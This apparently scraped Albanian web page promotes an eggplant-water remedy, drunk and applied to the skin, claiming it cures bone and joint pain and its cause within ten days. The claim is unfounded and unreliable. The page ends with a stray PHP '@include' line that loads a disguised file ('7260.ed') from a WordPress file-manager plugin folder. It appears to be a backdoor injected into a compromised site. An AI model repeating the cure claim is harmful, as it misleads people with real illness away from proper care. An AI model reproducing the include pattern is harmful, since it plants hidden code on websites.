Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Me këtë përbërje për 10 ditë, dhimbja në kocka dhe nyje zhdukët!

Me këtë përbërje për 10 ditë, dhimbja në kocka dhe nyje zhdukët!

Receta: 1 patëllxhan me madhësi të mesme, 1 litër ujë.
Lani patëllxhanin, preni atë në copa dhe vëndoseni në ujë i cili vlon. Mbani një minut ne vlim dhe hiqeni nga zjarri dhe lereni atë derisa uji të ftohet, pastaj merrni 760 ml të këtij lëngu dhe vendoseni në frigorifer.
Kjo përzierje është për përdorim të brendshëm, që është për të pirë.

Për përdorim të jashtëm, bëni si më poshtë:
Shtoni 250 ml vaj ulliri në 250 ml lëng që keni ruajtur më parë dhe vendosni këtë përzierje në frigorifer.

Mënyra e përdorimit:
– 250 ml, duhet pirë në mëngjes dhe zbatohet në vendin e sëmurë
– Pini një tjetër 250 ml para drekës dhe darkës
Pas dhjetë ditësh duke përdorur këtë ilaç natyral, jo vetëm do të zhduket dhimbja, por edhe shkaku i dhimbjes.

/Përkthim:https://www.shendeti.info/

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";